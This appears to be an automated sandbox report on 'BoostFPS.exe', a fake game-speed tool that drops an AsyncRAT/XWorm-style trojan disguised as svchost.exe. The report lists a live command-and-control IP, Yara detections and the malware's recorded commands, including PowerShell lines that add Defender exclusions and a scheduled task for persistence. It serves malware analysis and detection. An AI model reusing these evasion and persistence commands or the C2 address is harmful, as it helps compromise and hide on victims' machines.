                  Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 45.141.27.248:7777 -> 192.168.2.5:49979
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.141.27.248 7777Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 208.95.112.1 80Jump to behavior
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 45.141.27.248
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 4.0.svchost.exe.1a0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                  Source: global trafficTCP traffic: 192.168.2.5:49979 -> 45.141.27.248:7777
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox ViewASN Name: SPECTRAIPSpectraIPBVNL SPECTRAIPSpectraIPBVNL
                  Source: unknownDNS query: name: ip-api.com
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                  Source: powershell.exe, 0000000E.00000002.2473414490.0000021BD8467000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                  Source: powershell.exe, 0000000E.00000002.2473414490.0000021BD8467000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                  Source: BoostFPS.exe, 00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3313721624.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.2099134483.00000000001A2000.00000002.00000001.01000000.00000006.sdmp, svchost.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                  Source: powershell.exe, 00000008.00000002.2196208594.000001DBF0263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2291803371.000002243E563000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2447582953.0000021BCFCB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2670955565.000002706F582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000011.00000002.2515230432.000002705F739000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000008.00000002.2179167608.000001DBE041A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2235051244.000002242E718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2349983022.0000021BBFE68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2515230432.000002705F739000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: svchost.exe, 00000004.00000002.3313721624.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2179167608.000001DBE01F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2235051244.000002242E4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2349983022.0000021BBFC41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2515230432.000002705F511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000008.00000002.2179167608.000001DBE041A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2235051244.000002242E718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2349983022.0000021BBFE68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2515230432.000002705F739000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 0000000E.00000002.2468534296.0000021BD8078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwoft.com/pkiops/c
                  Source: powershell.exe, 00000011.00000002.2515230432.000002705F739000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000011.00000002.2706955560.0000027077B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                  Source: powershell.exe, 00000011.00000002.2706284204.0000027077A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                  Source: powershell.exe, 0000000E.00000002.2468534296.0000021BD8078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwft.com/pkiops/crProPCA2011_2011-l0a
                  Source: powershell.exe, 00000011.00000002.2700888169.0000027077893000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://Token.dll
                  Source: powershell.exe, 00000008.00000002.2179167608.000001DBE01F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2235051244.000002242E4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2349983022.0000021BBFC41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2515230432.000002705F511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000011.00000002.2670955565.000002706F582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000011.00000002.2670955565.000002706F582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000011.00000002.2670955565.000002706F582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000011.00000002.2515230432.000002705F739000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000008.00000002.2201726247.000001DBF867A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co_
                  Source: powershell.exe, 00000008.00000002.2196208594.000001DBF0263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2291803371.000002243E563000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2447582953.0000021BCFCB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2670955565.000002706F582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                  Operating System Destruction

                  barindex
                  Protects its processes via BreakOnTermination flag
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: 01 00 00 00 Jump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0.2.BoostFPS.exe.250c800.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 4.0.svchost.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.2.BoostFPS.exe.251fc40.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000004.00000000.2099134483.00000000001A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_00007FF848DAE5D84_2_00007FF848DAE5D8
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_00007FF848DA16DE4_2_00007FF848DA16DE
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_00007FF848DA12904_2_00007FF848DA1290
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_00007FF848DA6E724_2_00007FF848DA6E72
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_00007FF848DA60C64_2_00007FF848DA60C6
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_00007FF848DA172B4_2_00007FF848DA172B
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_00007FF848DA20F14_2_00007FF848DA20F1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_00007FF848DA10A54_2_00007FF848DA10A5
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 21_2_00007FF848D916DE21_2_00007FF848D916DE
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 21_2_00007FF848D920F121_2_00007FF848D920F1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 21_2_00007FF848D9103821_2_00007FF848D91038
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 21_2_00007FF848D9171921_2_00007FF848D91719
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_00007FF848DB16DE22_2_00007FF848DB16DE
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_00007FF848DB20F122_2_00007FF848DB20F1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_00007FF848DB103822_2_00007FF848DB1038
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_00007FF848DB171922_2_00007FF848DB1719
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 23_2_00007FF848DA16DE23_2_00007FF848DA16DE
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 23_2_00007FF848DA20F123_2_00007FF848DA20F1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 23_2_00007FF848DA103823_2_00007FF848DA1038
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 23_2_00007FF848DA171923_2_00007FF848DA1719
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_00007FF848D7171924_2_00007FF848D71719
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_00007FF848D7103824_2_00007FF848D71038
                  Source: BoostFPS.exe, 00000000.00000002.2101710960.000000001B161000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe4 vs BoostFPS.exe
                  Source: BoostFPS.exe, 00000000.00000000.2054977502.00000000000D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFPS_BY FILMGODX.exe4 vs BoostFPS.exe
                  Source: BoostFPS.exe, 00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe4 vs BoostFPS.exe
                  Source: BoostFPS.exeBinary or memory string: OriginalFilenameFPS_BY FILMGODX.exe4 vs BoostFPS.exe
                  Source: BoostFPS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.BoostFPS.exe.250c800.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 4.0.svchost.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.2.BoostFPS.exe.251fc40.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000004.00000000.2099134483.00000000001A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: BoostFPS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: BoostFPS.exe, KREREaf5y7YuM0yCltBL1aOyI5Yy16T9MMxdOrdO08a3tMGXNQCNV0oTCmPwJrOMb6GJ1MrKY0eKPJ6Qg4HLKBRSy3cVQWWeb.csCryptographic APIs: 'TransformFinalBlock'
                  Source: svchost.exe.0.dr, cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.csCryptographic APIs: 'TransformFinalBlock'
                  Source: svchost.exe.0.dr, cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.csCryptographic APIs: 'TransformFinalBlock'
                  Source: svchost.exe.0.dr, NFaIfEAolBHm9leRATPwGPwni5MWFnZCQHqP.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, NFaIfEAolBHm9leRATPwGPwni5MWFnZCQHqP.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, NFaIfEAolBHm9leRATPwGPwni5MWFnZCQHqP.csCryptographic APIs: 'TransformFinalBlock'
                  Source: svchost.exe.0.dr, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.csBase64 encoded string: 'iGuLJeMZTCxhiVAFKYKSHLglLWNiQIus7vL8J7X0oSwSdjNYKxTVrNK9MfRMYZ0GRDFoPoHcrgmByAUCsykkalqy9kc7O2Pp', 'HxADIHF9pD5mNHjxilUnSqReNqTHkmpssWQo2nIoNOFTgL48ihvC8v67CvpKBy3hzjf4qW3ijQ1x9wQLSjACQeoMbPqhDn8g', 'm3Rppmws2VW8YFVkUbCs4hhgYoexlQdLAnpzaHgr2ciOgZVtB93VQQdD4LbLiTUsznMkuEDsqZfiAoVfynvcV2gIHrMzBQ1x'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.csBase64 encoded string: 'iGuLJeMZTCxhiVAFKYKSHLglLWNiQIus7vL8J7X0oSwSdjNYKxTVrNK9MfRMYZ0GRDFoPoHcrgmByAUCsykkalqy9kc7O2Pp', 'HxADIHF9pD5mNHjxilUnSqReNqTHkmpssWQo2nIoNOFTgL48ihvC8v67CvpKBy3hzjf4qW3ijQ1x9wQLSjACQeoMbPqhDn8g', 'm3Rppmws2VW8YFVkUbCs4hhgYoexlQdLAnpzaHgr2ciOgZVtB93VQQdD4LbLiTUsznMkuEDsqZfiAoVfynvcV2gIHrMzBQ1x'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.csBase64 encoded string: 'iGuLJeMZTCxhiVAFKYKSHLglLWNiQIus7vL8J7X0oSwSdjNYKxTVrNK9MfRMYZ0GRDFoPoHcrgmByAUCsykkalqy9kc7O2Pp', 'HxADIHF9pD5mNHjxilUnSqReNqTHkmpssWQo2nIoNOFTgL48ihvC8v67CvpKBy3hzjf4qW3ijQ1x9wQLSjACQeoMbPqhDn8g', 'm3Rppmws2VW8YFVkUbCs4hhgYoexlQdLAnpzaHgr2ciOgZVtB93VQQdD4LbLiTUsznMkuEDsqZfiAoVfynvcV2gIHrMzBQ1x'
                  Source: svchost.exe.0.dr, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: svchost.exe.0.dr, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@32/23@1/2
                  Source: C:\Users\user\Desktop\BoostFPS.exeFile created: C:\Users\user\AppData\Roaming\FPS_BY FILMGODX.batJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1476:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2656:120:WilError_03
                  Source: C:\Users\user\Desktop\BoostFPS.exeMutant created: \Sessions\1\BaseNamedObjects\miwy40XH7br6fj8ki
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5492:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3608:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MYeD7AkariKEQNYO
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\FPS_BY FILMGODX.bat" "
                  Source: BoostFPS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: BoostFPS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\BoostFPS.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: BoostFPS.exeReversingLabs: Detection: 65%
                  Source: unknownProcess created: C:\Users\user\Desktop\BoostFPS.exe "C:\Users\user\Desktop\BoostFPS.exe"
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\FPS_BY FILMGODX.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com Mode 100,25
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\FPS_BY FILMGODX.bat" "Jump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com Mode 100,25Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: urlmon.dllJump to behavior
